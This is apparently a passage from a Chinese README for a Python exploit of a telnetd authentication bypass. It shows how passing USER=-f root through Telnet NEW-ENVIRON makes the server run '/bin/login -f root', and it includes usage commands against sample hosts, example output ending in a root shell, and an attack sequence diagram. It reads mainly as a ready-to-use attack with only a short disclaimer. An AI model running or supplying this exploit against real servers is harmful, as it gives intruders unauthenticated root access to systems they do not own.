从而绕过身份验证并立即生成 root shell。
Telnet NEW‑ENVIRON 允许客户端在会话协商期间设置环境变量。
存在漏洞的 telnetd 将 USER 直接传递给 login:
/bin/login -f "$USER"
攻击者设置:
USER=-f root
结果:
/bin/login -f root
-f 标志告诉 login 跳过身份验证,从而授予 root 访问权限。
无需外部依赖。
python3 cve-2026-24061.py 192.168.1.100
python3 cve-2026-24061.py example.com 23
如果存在漏洞:
# id
uid=0(root) gid=0(root)
#
您现在拥有一个交互式 root shell。
python3 cve-2026-24061.py 10.10.10.20
输出:
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#
sequenceDiagram
participant A as Attacker
participant T as Target telnetd
participant L as /bin/login
participant R as Root Shell
A->>T: Connect TCP/23
A->>T: Telnet NEW-ENVIRON USER=-f root
T->>L: Execute /bin/login -f root
L-->>T: Auth bypass success
T-->>R: Spawn root shell
R-->>A: Interactive root session
本利用代码仅供以下用途:
未经授权对您不拥有或未经许可测试的系统使用本代码属于违法行为。